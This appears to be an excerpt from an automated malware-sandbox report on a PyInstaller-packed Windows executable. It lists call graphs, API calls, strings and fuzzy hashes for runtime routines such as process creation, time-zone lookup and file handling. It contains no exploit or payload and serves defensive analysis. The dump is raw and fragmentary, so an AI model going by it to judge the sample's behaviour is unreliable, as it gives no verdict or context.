11 API calls 18026->18027 18027->18022 18030 7ff7333ab464 __free_lconv_mon 11 API calls 18031 7ff7333aa1a1 18030->18031 18032 7ff7333ab464 __free_lconv_mon 11 API calls 18031->18032 18032->18022 18034 7ff7333aa52b 18033->18034 18039 7ff7333aa542 18033->18039 18034->17647 18035 7ff7333b0b10 MultiByteToWideChar _fread_nolock 18035->18039 18036 7ff7333afe04 _get_daylight 11 API calls 18036->18039 18037 7ff7333aa5b6 18038 7ff7333ab464 __free_lconv_mon 11 API calls 18037->18038 18038->18034 18039->18034 18039->18035 18039->18036 18039->18037 18040 7ff7333ab464 __free_lconv_mon 11 API calls 18039->18040 18040->18039 18042 7ff7333b3cd0 18041->18042 18043 7ff7333aa166 18041->18043 18044 7ff7333ae6c4 _fread_nolock 12 API calls 18042->18044 18043->18025 18043->18026 18046 7ff7333b3d07 memcpy_s 18044->18046 18045 7ff7333ab464 __free_lconv_mon 11 API calls 18047 7ff7333b3d27 FreeEnvironmentStringsW 18045->18047 18046->18045 18047->18043 18049 7ff7333aa2f0 18048->18049 18050 7ff7333afe04 _get_daylight 11 API calls 18049->18050 18056 7ff7333aa32b 18050->18056 18051 7ff7333ab464 __free_lconv_mon 11 API calls 18052 7ff7333aa182 18051->18052 18052->18030 18053 7ff7333aa3ad 18054 7ff7333ab464 __free_lconv_mon 11 API calls 18053->18054 18054->18052 18055 7ff7333afe04 _get_daylight 11 API calls 18055->18056 18056->18053 18056->18055 18057 7ff7333aa39c 18056->18057 18058 7ff7333b16e4 37 API calls 18056->18058 18061 7ff7333aa3d0 18056->18061 18064 7ff7333ab464 __free_lconv_mon 11 API calls 18056->18064 18065 7ff7333aa333 18056->18065 18059 7ff7333aa3e4 11 API calls 18057->18059 18058->18056 18060 7ff7333aa3a4 18059->18060 18062 7ff7333ab464 __free_lconv_mon 11 API calls 18060->18062 18063 7ff7333ab844 _isindst 17 API calls 18061->18063 18062->18065 18066 7ff7333aa3e2 18063->18066 18064->18056 18065->18051 18068 7ff7333b9da1 __crtLCMapStringW 18067->18068 18069 7ff7333b835e 18068->18069 18070 7ff7333b01d4 6 API calls 18068->18070 18069->17671 18069->17672 18070->18069 21361 7ff7333aacd0 21364 7ff7333aac48 21361->21364 21371 7ff7333b1548 EnterCriticalSection 21364->21371 21372 7ff7333abed0 21373 7ff7333abed5 21372->21373 21377 7ff7333abeea 21372->21377 21378 7ff7333abef0 21373->21378 21379 7ff7333abf32 21378->21379 21380 7ff7333abf3a 21378->21380 21382 7ff7333ab464 __free_lconv_mon 11 API calls 21379->21382 21381 7ff7333ab464 __free_lconv_mon 11 API calls 21380->21381 21383 7ff7333abf47 21381->21383 21382->21380 21384 7ff7333ab464 __free_lconv_mon 11 API calls 21383->21384 21385 7ff7333abf54 21384->21385 21386 7ff7333ab464 __free_lconv_mon 11 API calls 21385->21386 21387 7ff7333abf61 21386->21387 21388 7ff7333ab464 __free_lconv_mon 11 API calls 21387->21388 21389 7ff7333abf6e 21388->21389 21390 7ff7333ab464 __free_lconv_mon 11 API calls 21389->21390 21391 7ff7333abf7b 21390->21391 21392 7ff7333ab464 __free_lconv_mon 11 API calls 21391->21392 21393 7ff7333abf88 21392->21393 21394 7ff7333ab464 __free_lconv_mon 11 API calls 21393->21394 21395 7ff7333abf95 21394->21395 21396 7ff7333ab464 __free_lconv_mon 11 API calls 21395->21396 21397 7ff7333abfa5 21396->21397 21398 7ff7333ab464 __free_lconv_mon 11 API calls 21397->21398 21399 7ff7333abfb5 21398->21399 21404 7ff7333abd9c 21399->21404 21418 7ff7333b1548 EnterCriticalSection 21404->21418 21420 7ff7333b26d0 21438 7ff7333b1548 EnterCriticalSection 21420->21438 21021 7ff7333bbe53 21022 7ff7333bbe63 21021->21022 21025 7ff7333a62e8 LeaveCriticalSection 21022->21025

                                                                                                                                                                                                                                                                                Executed Functions

                                                                                                                                                                                                                                                                                Function 00007FF733398020 Relevance: 70.3, APIs: 36, Strings: 4, Instructions: 257synchronizationwindowregistryCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                control_flow_graph 0 7ff733398020-7ff733398166 call 7ff73339be10 call 7ff733398950 SetConsoleCtrlHandler GetStartupInfoW call 7ff7333a6260 call 7ff7333ab384 call 7ff7333a9658 call 7ff7333a6260 call 7ff7333ab384 call 7ff7333a9658 call 7ff7333a6260 call 7ff7333ab384 call 7ff7333a9658 GetCommandLineW CreateProcessW 23 7ff733398168-7ff733398188 GetLastError call 7ff733392310 0->23 24 7ff73339818d-7ff7333981c9 RegisterClassW 0->24 32 7ff733398479-7ff73339849f call 7ff73339bb10 23->32 26 7ff7333981d1-7ff733398225 CreateWindowExW 24->26 27 7ff7333981cb GetLastError 24->27 29 7ff73339822f-7ff733398234 ShowWindow 26->29 30 7ff733398227-7ff73339822d GetLastError 26->30 27->26 31 7ff73339823a-7ff73339824a WaitForSingleObject 29->31 30->31 33 7ff7333982c8-7ff7333982cf 31->33 34 7ff73339824c 31->34 37 7ff733398312-7ff733398319 33->37 38 7ff7333982d1-7ff7333982e1 WaitForSingleObject 33->38 36 7ff733398250-7ff733398253 34->36 40 7ff733398255 GetLastError 36->40 41 7ff73339825b-7ff733398262 36->41 44 7ff733398400-7ff733398419 GetMessageW 37->44 45 7ff73339831f-7ff733398335 QueryPerformanceFrequency QueryPerformanceCounter 37->45 42 7ff733398438-7ff733398442 38->42 43 7ff7333982e7-7ff7333982f7 TerminateProcess 38->43 40->41 41->38 47 7ff733398264-7ff733398281 PeekMessageW 41->47 50 7ff733398451-7ff733398475 GetExitCodeProcess CloseHandle * 2 42->50 51 7ff733398444-7ff73339844a DestroyWindow 42->51 52 7ff7333982ff-7ff73339830d WaitForSingleObject 43->52 53 7ff7333982f9 GetLastError 43->53 48 7ff73339842f-7ff733398436 44->48 49 7ff73339841b-7ff733398429 TranslateMessage DispatchMessageW 44->49 46 7ff733398340-7ff733398378 MsgWaitForMultipleObjects PeekMessageW 45->46 54 7ff7333983b3-7ff7333983ba 46->54 55 7ff73339837a 46->55 56 7ff733398283-7ff7333982b4 TranslateMessage DispatchMessageW PeekMessageW 47->56 57 7ff7333982b6-7ff7333982c6 WaitForSingleObject 47->57 48->42 48->44 49->48 50->32 51->50 52->42 53->52 54->44 59 7ff7333983bc-7ff7333983e5 QueryPerformanceCounter 54->59 58 7ff733398380-7ff7333983b1 TranslateMessage DispatchMessageW PeekMessageW 55->58 56->56 56->57 57->33 57->36 58->54 58->58 59->46 60 7ff7333983eb-7ff7333983f2 59->60 60->42 61 7ff7333983f4-7ff7333983f8 60->61 61->44
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: ErrorLastMessage$ObjectProcessSingleWait$CloseCreateHandlePeekWindow_invalid_parameter_noinfo$ByteCharClassCodeCommandConsoleCtrlCurrentDestroyDispatchExitFormatHandlerInfoLineMultiRegisterStartupTerminateTranslateWide
                                                                                                                                                                                                                                                                                • String ID: CreateProcessW$Failed to create child process!$PyInstaller Onefile Hidden Window$PyInstallerOnefileHiddenWindow
                                                                                                                                                                                                                                                                                • API String ID: 4208240515-3165540532
                                                                                                                                                                                                                                                                                • Opcode ID: 40a2b2c96db5062fbaff54aa02804a1320958b809a954de9be60782f8870c354
                                                                                                                                                                                                                                                                                • Instruction ID: 558c70802ada2a0de58fdda866f7761b89b5f4cece57c0aa629a83d9a0aa3a5c
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 40a2b2c96db5062fbaff54aa02804a1320958b809a954de9be60782f8870c354
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 22D1A831A08B82E6EBA0AF74E8502BDB760FF84758F808239DA5D67695DF3CD145D720
                                                                                                                                                                                                                                                                                Function 00007FF7333B6E70 Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 334timeCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                control_flow_graph 505 7ff7333b6e70-7ff7333b6eab call 7ff7333b67f8 call 7ff7333b6800 call 7ff7333b6868 512 7ff7333b6eb1-7ff7333b6ebc call 7ff7333b6808 505->512 513 7ff7333b70d5-7ff7333b7121 call 7ff7333ab844 call 7ff7333b67f8 call 7ff7333b6800 call 7ff7333b6868 505->513 512->513 518 7ff7333b6ec2-7ff7333b6ecc 512->518 538 7ff7333b725f-7ff7333b72cd call 7ff7333ab844 call 7ff7333b27e8 513->538 539 7ff7333b7127-7ff7333b7132 call 7ff7333b6808 513->539 520 7ff7333b6eee-7ff7333b6ef2 518->520 521 7ff7333b6ece-7ff7333b6ed1 518->521 525 7ff7333b6ef5-7ff7333b6efd 520->525 523 7ff7333b6ed4-7ff7333b6edf 521->523 526 7ff7333b6ee1-7ff7333b6ee8 523->526 527 7ff7333b6eea-7ff7333b6eec 523->527 525->525 529 7ff7333b6eff-7ff7333b6f12 call 7ff7333ae6c4 525->529 526->523 526->527 527->520 531 7ff7333b6f1b-7ff7333b6f29 527->531 536 7ff7333b6f14-7ff7333b6f16 call 7ff7333ab464 529->536 537 7ff7333b6f2a-7ff7333b6f36 call 7ff7333ab464 529->537 536->531 547 7ff7333b6f3d-7ff7333b6f45 537->547 559 7ff7333b72cf-7ff7333b72d6 538->559 560 7ff7333b72db-7ff7333b72de 538->560 539->538 548 7ff7333b7138-7ff7333b7143 call 7ff7333b6838 539->548 547->547 550 7ff7333b6f47-7ff7333b6f58 call 7ff7333b16e4 547->550 548->538 557 7ff7333b7149-7ff7333b716c call 7ff7333ab464 GetTimeZoneInformation 548->557 550->513 558 7ff7333b6f5e-7ff7333b6fb4 call 7ff7333bb740 * 4 call 7ff7333b6d8c 550->558 573 7ff7333b7172-7ff7333b7193 557->573 574 7ff7333b7234-7ff7333b725e call 7ff7333b67f0 call 7ff7333b67e0 call 7ff7333b67e8 557->574 618 7ff7333b6fb6-7ff7333b6fba 558->618 561 7ff7333b736b-7ff7333b736e 559->561 562 7ff7333b72e0 560->562 563 7ff7333b7315-7ff7333b7328 call 7ff7333ae6c4 560->563 566 7ff7333b72e3 call 7ff7333b70ec 561->566 567 7ff7333b7374-7ff7333b737c call 7ff7333b6e70 561->567 562->566 582 7ff7333b7333-7ff7333b734e call 7ff7333b27e8 563->582 583 7ff7333b732a 563->583 578 7ff7333b72e8-7ff7333b7314 call 7ff7333ab464 call 7ff73339bb10 566->578 567->578 580 7ff7333b7195-7ff7333b719b 573->580 581 7ff7333b719e-7ff7333b71a5 573->581 580->581 588 7ff7333b71b9 581->588 589 7ff7333b71a7-7ff7333b71af 581->589 602 7ff7333b7350-7ff7333b7353 582->602 603 7ff7333b7355-7ff7333b7367 call 7ff7333ab464 582->603 590 7ff7333b732c-7ff7333b7331 call 7ff7333ab464 583->590 595 7ff7333b71bb-7ff7333b722f call 7ff7333bb740 * 4 call 7ff7333b3dcc call 7ff7333b7384 * 2 588->595 589->588 597 7ff7333b71b1-7ff7333b71b7 589->597 590->562 595->574 597->595 602->590 603->561 620 7ff7333b6fc0-7ff7333b6fc4 618->620 621 7ff7333b6fbc 618->621 620->618 623 7ff7333b6fc6-7ff7333b6feb call 7ff7333a7b18 620->623 621->620 629 7ff7333b6fee-7ff7333b6ff2 623->629 631 7ff7333b7001-7ff7333b7005 629->631 632 7ff7333b6ff4-7ff7333b6fff 629->632 631->629 632->631 634 7ff7333b7007-7ff7333b700b 632->634 635 7ff7333b700d-7ff7333b7035 call 7ff7333a7b18 634->635 636 7ff7333b708c-7ff7333b7090 634->636 645 7ff7333b7053-7ff7333b7057 635->645 646 7ff7333b7037 635->646 639 7ff7333b7092-7ff7333b7094 636->639 640 7ff7333b7097-7ff7333b70a4 636->640 639->640 641 7ff7333b70bf-7ff7333b70ce call 7ff7333b67f0 call 7ff7333b67e0 640->641 642 7ff7333b70a6-7ff7333b70bc call 7ff7333b6d8c 640->642 641->513 642->641 645->636 651 7ff7333b7059-7ff7333b7077 call 7ff7333a7b18 645->651 649 7ff7333b703a-7ff7333b7041 646->649 649->645 652 7ff7333b7043-7ff7333b7051 649->652 657 7ff7333b7083-7ff7333b708a 651->657 652->645 652->649 657->636 658 7ff7333b7079-7ff7333b707d 657->658 658->636 659 7ff7333b707f 658->659 659->657
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7333B6EB5
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7333B6808: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7333B681C
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7333AB464: RtlFreeHeap.NTDLL(?,?,?,00007FF7333B3F92,?,?,?,00007FF7333B3FCF,?,?,00000000,00007FF7333B4495,?,?,?,00007FF7333B43C7), ref: 00007FF7333AB47A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7333AB464: GetLastError.KERNEL32(?,?,?,00007FF7333B3F92,?,?,?,00007FF7333B3FCF,?,?,00000000,00007FF7333B4495,?,?,?,00007FF7333B43C7), ref: 00007FF7333AB484
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7333AB844: IsProcessorFeaturePresent.KERNEL32(?,?,?,?,00007FF7333AB823,?,?,?,?,?,00007FF7333AB70E), ref: 00007FF7333AB84D
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7333AB844: GetCurrentProcess.KERNEL32(?,?,?,?,00007FF7333AB823,?,?,?,?,?,00007FF7333AB70E), ref: 00007FF7333AB872
                                                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7333B6EA4
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7333B6868: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7333B687C
                                                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7333B711A
                                                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7333B712B
                                                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7333B713C
                                                                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7333B737C), ref: 00007FF7333B7163
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _get_daylight$_invalid_parameter_noinfo$CurrentErrorFeatureFreeHeapInformationLastPresentProcessProcessorTimeZone
                                                                                                                                                                                                                                                                                • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                                                • API String ID: 4070488512-239921721
                                                                                                                                                                                                                                                                                • Opcode ID: 1cc6d2bc0113d7e20a77d6be4757883c424c8a6b3909b765b0ec1a4afa43a119
                                                                                                                                                                                                                                                                                • Instruction ID: 2b253d452e0636c53cb1e50e651d44e5f70d52eb3398e9e703a01b2b0dbb2069
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 1cc6d2bc0113d7e20a77d6be4757883c424c8a6b3909b765b0ec1a4afa43a119
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 0FD1C126A08242A6EBB0FF25D4511B9B261EF84784FC4C13EEA4D67796DF3CE441A360
                                                                                                                                                                                                                                                                                Function 00007FF7333B7BD4 Relevance: 13.8, APIs: 9, Instructions: 276fileCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                control_flow_graph 719 7ff7333b7bd4-7ff7333b7c47 call 7ff7333b7908 722 7ff7333b7c61-7ff7333b7c6b call 7ff7333a945c 719->722 723 7ff7333b7c49-7ff7333b7c52 call 7ff7333a5e28 719->723 729 7ff7333b7c86-7ff7333b7cef CreateFileW 722->729 730 7ff7333b7c6d-7ff7333b7c84 call 7ff7333a5e28 call 7ff7333a5e48 722->730 728 7ff7333b7c55-7ff7333b7c5c call 7ff7333a5e48 723->728 746 7ff7333b7fa2-7ff7333b7fc2 728->746 731 7ff7333b7cf1-7ff7333b7cf7 729->731 732 7ff7333b7d6c-7ff7333b7d77 GetFileType 729->732 730->728 735 7ff7333b7d39-7ff7333b7d67 GetLastError call 7ff7333a5dbc 731->735 736 7ff7333b7cf9-7ff7333b7cfd 731->736 738 7ff7333b7d79-7ff7333b7db4 GetLastError call 7ff7333a5dbc CloseHandle 732->738 739 7ff7333b7dca-7ff7333b7dd1 732->739 735->728 736->735 744 7ff7333b7cff-7ff7333b7d37 CreateFileW 736->744 738->728 754 7ff7333b7dba-7ff7333b7dc5 call 7ff7333a5e48 738->754 742 7ff7333b7dd3-7ff7333b7dd7 739->742 743 7ff7333b7dd9-7ff7333b7ddc 739->743 749 7ff7333b7de2-7ff7333b7e37 call 7ff7333a9374 742->749 743->749 750 7ff7333b7dde 743->750 744->732 744->735 757 7ff7333b7e56-7ff7333b7e87 call 7ff7333b7688 749->757 758 7ff7333b7e39-7ff7333b7e45 call 7ff7333b7b10 749->758 750->749 754->728 764 7ff7333b7e89-7ff7333b7e8b 757->764 765 7ff7333b7e8d-7ff7333b7ecf 757->765 758->757 766 7ff7333b7e47 758->766 767 7ff7333b7e49-7ff7333b7e51 call 7ff7333ab9c8 764->767 768 7ff7333b7ef1-7ff7333b7efc 765->768 769 7ff7333b7ed1-7ff7333b7ed5 765->769 766->767 767->746 771 7ff7333b7f02-7ff7333b7f06 768->771 772 7ff7333b7fa0 768->772 769->768 770 7ff7333b7ed7-7ff7333b7eec 769->770 770->768 771->772 774 7ff7333b7f0c-7ff7333b7f51 CloseHandle CreateFileW 771->774 772->746 776 7ff7333b7f86-7ff7333b7f9b 774->776 777 7ff7333b7f53-7ff7333b7f81 GetLastError call 7ff7333a5dbc call 7ff7333a959c 774->777 776->772 777->776
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: File$CreateErrorLast_invalid_parameter_noinfo$CloseHandle$Type
                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                • API String ID: 1617910340-0
                                                                                                                                                                                                                                                                                • Opcode ID: f7d25cc6398c99507331e2d119a18c280b6cb5988aed80ed714a7f2df808d279
                                                                                                                                                                                                                                                                                • Instruction ID: 4be630c3b55c8799796fad7ba020802e307c8489bfe119c0ffd646341d853ce7
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f7d25cc6398c99507331e2d119a18c280b6cb5988aed80ed714a7f2df808d279
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 36C1D333B28A4195EBA0EF64D4806BC7771FB49B98B418239EE2E67794CF38D451D310
                                                                                                                                                                                                                                                                                Function 00007FF733397800 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 89fileCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: FileFind$DirectoryRemove$CloseDeleteFirstNext
                                                                                                                                                                                                                                                                                • String ID: %s\*
                                                                                                                                                                                                                                                                                • API String ID: 1057558799-766152087
                                                                                                                                                                                                                                                                                • Opcode ID: d57e7e696b90763087bb52608de81a3ef4359c1814b552ec37b5c7e1afda5017
                                                                                                                                                                                                                                                                                • Instruction ID: 7f03d80ac12270cbfd615bf6f29bc1af973018799cab9570462b9f5820e8df67
                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: d57e7e696b90763087bb52608de81a3ef4359c1814b552ec37b5c7e1afda5017
                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 8141A521A0C542E1EAB0BF24E4443BAA360FB94750FC0863AE99D636D8DF3CD60AD710
                                                                                                                                                                                                                                                                                Function 00007FF7333B70EC Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 143timeCOMMON
                                                                                                                                                                                                                                                                                Download Yara Rule

                                                                                                                                                                                                                                                                                Control-flow Graph

                                                                                                                                                                                                                                                                                • Executed
                                                                                                                                                                                                                                                                                • Not Executed
                                                                                                                                                                                                                                                                                control_flow_graph 1040 7ff7333b70ec-7ff7333b7121 call 7ff7333b67f8 call 7ff7333b6800 call 7ff7333b6868 1047 7ff7333b725f-7ff7333b72cd call 7ff7333ab844 call 7ff7333b27e8 1040->1047 1048 7ff7333b7127-7ff7333b7132 call 7ff7333b6808 1040->1048 1060 7ff7333b72cf-7ff7333b72d6 1047->1060 1061 7ff7333b72db-7ff7333b72de 1047->1061 1048->1047 1053 7ff7333b7138-7ff7333b7143 call 7ff7333b6838 1048->1053 1053->1047 1059 7ff7333b7149-7ff7333b716c call 7ff7333ab464 GetTimeZoneInformation 1053->1059 1072 7ff7333b7172-7ff7333b7193 1059->1072 1073 7ff7333b7234-7ff7333b725e call 7ff7333b67f0 call 7ff7333b67e0 call 7ff7333b67e8 1059->1073 1062 7ff7333b736b-7ff7333b736e 1060->1062 1063 7ff7333b72e0 1061->1063 1064 7ff7333b7315-7ff7333b7328 call 7ff7333ae6c4 1061->1064 1066 7ff7333b72e3 call 7ff7333b70ec 1062->1066 1067 7ff7333b7374-7ff7333b737c call 7ff7333b6e70 1062->1067 1063->1066 1079 7ff7333b7333-7ff7333b734e call 7ff7333b27e8 1064->1079 1080 7ff7333b732a 1064->1080 1075 7ff7333b72e8-7ff7333b7314 call 7ff7333ab464 call 7ff73339bb10 1066->1075 1067->1075 1077 7ff7333b7195-7ff7333b719b 1072->1077 1078 7ff7333b719e-7ff7333b71a5 1072->1078 1077->1078 1084 7ff7333b71b9 1078->1084 1085 7ff7333b71a7-7ff7333b71af 1078->1085 1096 7ff7333b7350-7ff7333b7353 1079->1096 1097 7ff7333b7355-7ff7333b7367 call 7ff7333ab464 1079->1097 1086 7ff7333b732c-7ff7333b7331 call 7ff7333ab464 1080->1086 1090 7ff7333b71bb-7ff7333b722f call 7ff7333bb740 * 4 call 7ff7333b3dcc call 7ff7333b7384 * 2 1084->1090 1085->1084 1092 7ff7333b71b1-7ff7333b71b7 1085->1092 1086->1063 1090->1073 1092->1090 1096->1086 1097->1062
                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7333B711A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7333B6868: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7333B687C
                                                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7333B712B
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7333B6808: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7333B681C
                                                                                                                                                                                                                                                                                • _get_daylight.LIBCMT ref: 00007FF7333B713C
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7333B6838: _invalid_parameter_noinfo.LIBCMT ref: 00007FF7333B684C
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7333AB464: RtlFreeHeap.NTDLL(?,?,?,00007FF7333B3F92,?,?,?,00007FF7333B3FCF,?,?,00000000,00007FF7333B4495,?,?,?,00007FF7333B43C7), ref: 00007FF7333AB47A
                                                                                                                                                                                                                                                                                  • Part of subcall function 00007FF7333AB464: GetLastError.KERNEL32(?,?,?,00007FF7333B3F92,?,?,?,00007FF7333B3FCF,?,?,00000000,00007FF7333B4495,?,?,?,00007FF7333B43C7), ref: 00007FF7333AB484
                                                                                                                                                                                                                                                                                • GetTimeZoneInformation.KERNELBASE(?,?,?,?,?,?,?,?,?,00000000,?,00007FF7333B737C), ref: 00007FF7333B7163
                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                • Source File: 00000000.00000002.2031307457.00007FF733391000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF733390000, based on PE: true
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031271730.00007FF733390000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031354191.00007FF7333BD000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031396525.00007FF7333D4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                • Associated: 00000000.00000002.2031469563.00007FF7333D6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_0_2_7ff733390000_main.jbxd
                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                                                • String ID: Eastern Standard Time$Eastern Summer Time
